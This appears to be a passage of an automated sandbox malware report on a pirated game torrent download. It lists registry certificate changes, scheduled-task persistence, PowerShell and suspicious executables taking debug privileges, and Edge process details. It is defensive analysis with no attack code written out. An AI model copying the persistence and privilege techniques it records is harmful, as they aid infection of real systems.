a085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 utorrent9.tmp Key created \REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000\Software\Microsoft\SystemCertificates\CA\Certificates\C94DC4831A901A9FEC0FB49B71BD49B5AAD4FAD0 utorrent9.tmp Set value (data) \REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000\Software\Microsoft\SystemCertificates\CA\Certificates\C94DC4831A901A9FEC0FB49B71BD49B5AAD4FAD0\Blob = 030000000100000014000000c94dc4831a901a9fec0fb49b71bd49b5aad4fad01400000001000000140000009327469803a951688e98d6c44248db23bf5894d204000000010000001000000026864c28a4de37f569c1ec87a0eccb270f0000000100000020000000b35e05950cfbd8259f9375ba101870b8c3c4c0ec5a529757e63167e9de26a9e81900000001000000100000009f6337f867e721aac07c3ba0fbdb64315c0000000100000004000000800100001800000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000005b040000308204573082023fa003020102021100b0573e9173972770dbb487cb3a452b38300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3234303331333030303030305a170d3237303331323233353935395a3032310b300906035504061302555331163014060355040a130d4c6574277320456e6372797074310b30090603550403130245363076301006072a8648ce3d020106052b8104002203620004d9f19e4687f8217160a826eba3fab9eada1db912a7d426d95114b1617c7596bf220b391fd5bed10a46aa2d3c4a09842ebe409555e91940376675ed324e770449f8707bc318e7cef77110feac74d800d4ed6d1c731633109c3ab2ea6c62f4bdb8a381f83081f5300e0603551d0f0101ff040403020186301d0603551d250416301406082b0601050507030206082b0601050507030130120603551d130101ff040830060101ff020100301d0603551d0e041604149327469803a951688e98d6c44248db23bf5894d2301f0603551d2304183016801479b459e67bb6e5e40173800888c81a58f6e99b6e303206082b0601050507010104263024302206082b060105050730028616687474703a2f2f78312e692e6c656e63722e6f72672f30130603551d20040c300a3008060667810c01020130270603551d1f0420301e301ca01aa0188616687474703a2f2f78312e632e6c656e63722e6f72672f300d06092a864886f70d01010b050003820201007d8b7b4a2035b20586088a6e9e4e3aaf8004c4845c33190a81484d96baefd41db584e69737fe66884f8b3936eb72653f33dcaf0ba31563bdf418d1682fc22127c8fcbeb38ba4c636d8e3fa6da4b593d60caed0d3970247a066f2d384e14d47810e4b12f518ae1ef89c66a05e75074817ae6966e86978370605c2e261ab10aff10ee60c71b4bc939a0b0748e55205c14e9fd960bfb2c408fabd8bb99f1f79a9c60ad1292c47a4ea19d0a5cc701fa11eebe59251e7b6f708d2630c4349a1623eaab4c152b64175469086dc83dd230a55090aaef0657bb3cb9b927473b3edc2fc19b5f5114ea223e90e4c2fc8d7ef990d785e4caaa8a2b9a19f33843df69054509316bcb994ae878693226171927bb7f70681c484571388cac6502641ce108c5668ab52a642a420d09ff5245f11945bc96acd557232ef625bd4076b7a9e93baa108c1de5f8f35fd03a501fb894c775b3e408d00a2e8bdb9163c84d3aaba059fd0966b58765ffc6586a8e1246a3c4b3fe9c02217e41fe73836524696b43a619752ca32e4cd2e8b6fb17f7d1cfebd5767da3727a0a1d4342f24c0a6bfef4f4d583c4e3abcdb032e02bee1c2fa4ebcc2fdae1672617949127ddfccebbff76e2472d740892ee6fd3e1303b2e7d1dd9b43d3fc4afff387435740928dd47fd97b99337929cac48a2e00f570a88303e21182e3830b17cef5cc98220e3abfd985981bf21f4e utorrent9.tmp Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 0f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e42000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e setup.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 utorrent9.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 setup.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 setup.exe -
NTFS ADS 6 IoCs
description ioc Process File opened for modification C:\Users\Admin\Downloads\The.Longing-CODEX\PCGAMESTORRENTS.COM.url:Zone.Identifier qbittorrent.exe File opened for modification C:\Users\Admin\Downloads\The.Longing-CODEX\README.txt:Zone.Identifier qbittorrent.exe File opened for modification C:\Users\Admin\Downloads\The.Longing-CODEX\codex.nfo:Zone.Identifier qbittorrent.exe File opened for modification C:\Users\Admin\Downloads\The.Longing-CODEX\codex-the.longing.iso:Zone.Identifier qbittorrent.exe File opened for modification C:\Users\Admin\Downloads\the-longing-codex_Dc3biRCmpz.zip:Zone.Identifier msedge.exe File opened for modification C:\Users\Admin\Downloads\The.Longing-CODEX\IGG-GAMES.COM.url:Zone.Identifier qbittorrent.exe -
Runs net.exe
-
Scheduled Task/Job: Scheduled Task 1 TTPs 10 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5580 schtasks.exe 5044 schtasks.exe 3288 schtasks.exe 4556 schtasks.exe 4496 schtasks.exe 5772 schtasks.exe 5236 schtasks.exe 336 schtasks.exe 5484 schtasks.exe 5192 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 3 IoCs
pid Process 3816 qbittorrent.exe 3080 qbittorrent.exe 712 qbittorrent.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3900 qbittorrent_5.0.1_x64_setup.exe 3900 qbittorrent_5.0.1_x64_setup.exe 3732 msedge.exe 3732 msedge.exe 3948 msedge.exe 3948 msedge.exe 4400 msedge.exe 4400 msedge.exe 1524 identity_helper.exe 1524 identity_helper.exe 1044 msedge.exe 1044 msedge.exe 1460 bommixpro.exe 1460 bommixpro.exe 1460 bommixpro.exe 1460 bommixpro.exe 1172 powershell.exe 1172 powershell.exe 4216 powershell.exe 4216 powershell.exe 3120 GtBtte.exe 3120 GtBtte.exe 3120 GtBtte.exe 3120 GtBtte.exe 396 Izaw0OcctowNceUeU.tmp 396 Izaw0OcctowNceUeU.tmp 1768 powershell.exe 1768 powershell.exe 1628 powershell.exe 1628 powershell.exe 4656 powershell.exe 4656 powershell.exe 4656 powershell.exe 2860 0VWXDTifa42.tmp 2860 0VWXDTifa42.tmp 4584 powershell.exe 4584 powershell.exe 4584 powershell.exe 1460 bommixpro.exe 1460 bommixpro.exe 1460 bommixpro.exe 1460 bommixpro.exe 424 Snetchball.exe 424 Snetchball.exe 424 Snetchball.exe 1460 bommixpro.exe 1460 bommixpro.exe 6056 powershell.exe 6056 powershell.exe 6056 powershell.exe 4700 powershell.exe 4700 powershell.exe 4700 powershell.exe 5808 powershell.EXE 5808 powershell.EXE 5808 powershell.EXE 2848 Snetchball.exe 2848 Snetchball.exe 2848 Snetchball.exe 2848 Snetchball.exe 2848 Snetchball.exe 2848 Snetchball.exe 4860 Snetchball.exe 4860 Snetchball.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 712 qbittorrent.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 18 IoCs
pid Process 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1172 powershell.exe Token: SeDebugPrivilege 4216 powershell.exe Token: SeDebugPrivilege 1768 powershell.exe Token: SeDebugPrivilege 1628 powershell.exe Token: SeDebugPrivilege 4656 powershell.exe Token: SeDebugPrivilege 4584 powershell.exe Token: SeIncreaseQuotaPrivilege 3324 WMIC.exe Token: SeSecurityPrivilege 3324 WMIC.exe Token: SeTakeOwnershipPrivilege 3324 WMIC.exe Token: SeLoadDriverPrivilege 3324 WMIC.exe Token: SeSystemProfilePrivilege 3324 WMIC.exe Token: SeSystemtimePrivilege 3324 WMIC.exe Token: SeProfSingleProcessPrivilege 3324 WMIC.exe Token: SeIncBasePriorityPrivilege 3324 WMIC.exe Token: SeCreatePagefilePrivilege 3324 WMIC.exe Token: SeBackupPrivilege 3324 WMIC.exe Token: SeRestorePrivilege 3324 WMIC.exe Token: SeShutdownPrivilege 3324 WMIC.exe Token: SeDebugPrivilege 3324 WMIC.exe Token: SeSystemEnvironmentPrivilege 3324 WMIC.exe Token: SeRemoteShutdownPrivilege 3324 WMIC.exe Token: SeUndockPrivilege 3324 WMIC.exe Token: SeManageVolumePrivilege 3324 WMIC.exe Token: 33 3324 WMIC.exe Token: 34 3324 WMIC.exe Token: 35 3324 WMIC.exe Token: 36 3324 WMIC.exe Token: SeIncreaseQuotaPrivilege 3324 WMIC.exe Token: SeSecurityPrivilege 3324 WMIC.exe Token: SeTakeOwnershipPrivilege 3324 WMIC.exe Token: SeLoadDriverPrivilege 3324 WMIC.exe Token: SeSystemProfilePrivilege 3324 WMIC.exe Token: SeSystemtimePrivilege 3324 WMIC.exe Token: SeProfSingleProcessPrivilege 3324 WMIC.exe Token: SeIncBasePriorityPrivilege 3324 WMIC.exe Token: SeCreatePagefilePrivilege 3324 WMIC.exe Token: SeBackupPrivilege 3324 WMIC.exe Token: SeRestorePrivilege 3324 WMIC.exe Token: SeShutdownPrivilege 3324 WMIC.exe Token: SeDebugPrivilege 3324 WMIC.exe Token: SeSystemEnvironmentPrivilege 3324 WMIC.exe Token: SeRemoteShutdownPrivilege 3324 WMIC.exe Token: SeUndockPrivilege 3324 WMIC.exe Token: SeManageVolumePrivilege 3324 WMIC.exe Token: 33 3324 WMIC.exe Token: 34 3324 WMIC.exe Token: 35 3324 WMIC.exe Token: 36 3324 WMIC.exe Token: SeDebugPrivilege 424 Snetchball.exe Token: SeDebugPrivilege 4372 Snetchball.exe Token: SeDebugPrivilege 1560 Snetchball.exe Token: SeDebugPrivilege 2752 Snetchball.exe Token: SeDebugPrivilege 4488 Snetchball.exe Token: SeDebugPrivilege 2848 Snetchball.exe Token: SeShutdownPrivilege 424 Snetchball.exe Token: SeCreatePagefilePrivilege 424 Snetchball.exe Token: SeShutdownPrivilege 424 Snetchball.exe Token: SeCreatePagefilePrivilege 424 Snetchball.exe Token: SeDebugPrivilege 5472 Snetchball.exe Token: SeShutdownPrivilege 424 Snetchball.exe Token: SeCreatePagefilePrivilege 424 Snetchball.exe Token: SeShutdownPrivilege 424 Snetchball.exe Token: SeCreatePagefilePrivilege 424 Snetchball.exe Token: SeShutdownPrivilege 424 Snetchball.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 396 Izaw0OcctowNceUeU.tmp 2860 0VWXDTifa42.tmp 2860 0VWXDTifa42.tmp 1172 utorrent9.tmp 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 444 setup.tmp 444 setup.tmp 444 setup.tmp 964 The Longing.exe 1376 OpenWith.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3732 wrote to memory of 3560 3732 msedge.exe 78 PID 3732 wrote to memory of 3560 3732 msedge.exe 78 PID 3732 wrote to memory of 3504 3732 msedge.exe 80 PID 3732 wrote to memory of 3504 3732 msedge.exe 80 PID 3732 wrote to memory of 3504 3732 msedge.exe 80 PID 3732 wrote to memory of 3504 3732 msedge.exe 80 PID 3732 wrote to memory of 3504 3732 msedge.exe 80 PID 3732 wrote to memory of 3504 3732 msedge.exe 80 PID 3732 wrote to memory of 3504 3732 msedge.exe 80 PID 3732 wrote to memory of 3504 3732 msedge.exe 80 PID 3732 wrote to memory of 3504 3732 msedge.exe 80 PID 3732 wrote to memory of 3504 3732 msedge.exe 80 PID 3732 wrote to memory of 3504 3732 msedge.exe 80 PID 3732 wrote to memory of 3504 3732 msedge.exe 80 PID 3732 wrote to memory of 3504 3732 msedge.exe 80 PID 3732 wrote to memory of 3504 3732 msedge.exe 80 PID 3732 wrote to memory of 3504 3732 msedge.exe 80 PID 3732 wrote to memory of 3504 3732 msedge.exe 80 PID 3732 wrote to memory of 3504 3732 msedge.exe 80 PID 3732 wrote to memory of 3504 3732 msedge.exe 80 PID 3732 wrote to memory of 3504 3732 msedge.exe 80 PID 3732 wrote to memory of 3504 3732 msedge.exe 80 PID 3732 wrote to memory of 3504 3732 msedge.exe 80 PID 3732 wrote to memory of 3504 3732 msedge.exe 80 PID 3732 wrote to memory of 3504 3732 msedge.exe 80 PID 3732 wrote to memory of 3504 3732 msedge.exe 80 PID 3732 wrote to memory of 3504 3732 msedge.exe 80 PID 3732 wrote to memory of 3504 3732 msedge.exe 80 PID 3732 wrote to memory of 3504 3732 msedge.exe 80 PID 3732 wrote to memory of 3504 3732 msedge.exe 80 PID 3732 wrote to memory of 3504 3732 msedge.exe 80 PID 3732 wrote to memory of 3504 3732 msedge.exe 80 PID 3732 wrote to memory of 3504 3732 msedge.exe 80 PID 3732 wrote to memory of 3504 3732 msedge.exe 80 PID 3732 wrote to memory of 3504 3732 msedge.exe 80 PID 3732 wrote to memory of 3504 3732 msedge.exe 80 PID 3732 wrote to memory of 3504 3732 msedge.exe 80 PID 3732 wrote to memory of 3504 3732 msedge.exe 80 PID 3732 wrote to memory of 3504 3732 msedge.exe 80 PID 3732 wrote to memory of 3504 3732 msedge.exe 80 PID 3732 wrote to memory of 3504 3732 msedge.exe 80 PID 3732 wrote to memory of 3504 3732 msedge.exe 80 PID 3732 wrote to memory of 3948 3732 msedge.exe 81 PID 3732 wrote to memory of 3948 3732 msedge.exe 81 PID 3732 wrote to memory of 1560 3732 msedge.exe 82 PID 3732 wrote to memory of 1560 3732 msedge.exe 82 PID 3732 wrote to memory of 1560 3732 msedge.exe 82 PID 3732 wrote to memory of 1560 3732 msedge.exe 82 PID 3732 wrote to memory of 1560 3732 msedge.exe 82 PID 3732 wrote to memory of 1560 3732 msedge.exe 82 PID 3732 wrote to memory of 1560 3732 msedge.exe 82 PID 3732 wrote to memory of 1560 3732 msedge.exe 82 PID 3732 wrote to memory of 1560 3732 msedge.exe 82 PID 3732 wrote to memory of 1560 3732 msedge.exe 82 PID 3732 wrote to memory of 1560 3732 msedge.exe 82 PID 3732 wrote to memory of 1560 3732 msedge.exe 82 PID 3732 wrote to memory of 1560 3732 msedge.exe 82 PID 3732 wrote to memory of 1560 3732 msedge.exe 82 PID 3732 wrote to memory of 1560 3732 msedge.exe 82 PID 3732 wrote to memory of 1560 3732 msedge.exe 82 PID 3732 wrote to memory of 1560 3732 msedge.exe 82 PID 3732 wrote to memory of 1560 3732 msedge.exe 82 PID 3732 wrote to memory of 1560 3732 msedge.exe 82 PID 3732 wrote to memory of 1560 3732 msedge.exe 82
Processes
-
C:\Users\Admin\AppData\Local\Temp\qbittorrent_5.0.1_x64_setup.exe"C:\Users\Admin\AppData\Local\Temp\qbittorrent_5.0.1_x64_setup.exe"1⤵
- Loads dropped DLL
- Drops file in Program Files directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:3900 -
C:\Program Files\qBittorrent\qbittorrent.exe"C:\Program Files\qBittorrent\qbittorrent.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: AddClipboardFormatListener
PID:3816
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3732 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffec3a53cb8,0x7ffec3a53cc8,0x7ffec3a53cd82⤵PID:3560
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1892,11421756230785192901,8918884678569281129,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1908 /prefetch:22⤵PID:3504
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1892,11421756230785192901,8918884678569281129,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2284 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:3948
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1892,11421756230785192901,8918884678569281129,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2536 /prefetch:82⤵PID:1560
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,11421756230785192901,8918884678569281129,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3224 /prefetch:12⤵PID:4020
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,11421756230785192901,8918884678569281129,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3240 /prefetch:12⤵PID:1648
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,11421756230785192901,8918884678569281129,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4932 /prefetch:12⤵PID:2852
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,11421756230785192901,8918884678569281129,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4960 /prefetch:12⤵PID:1136
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,11421756230785192901,8918884678569281129,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4064 /prefetch:12⤵PID:932
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,11421756230785192901,8918884678569281129,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3252 /prefetch:12⤵PID:2564
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,11421756230785192901,8918884678569281129,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5096 /prefetch:12⤵PID:2640
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,11421756230785192901,8918884678569281129,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5140 /prefetch:12⤵PID:1180
-
-
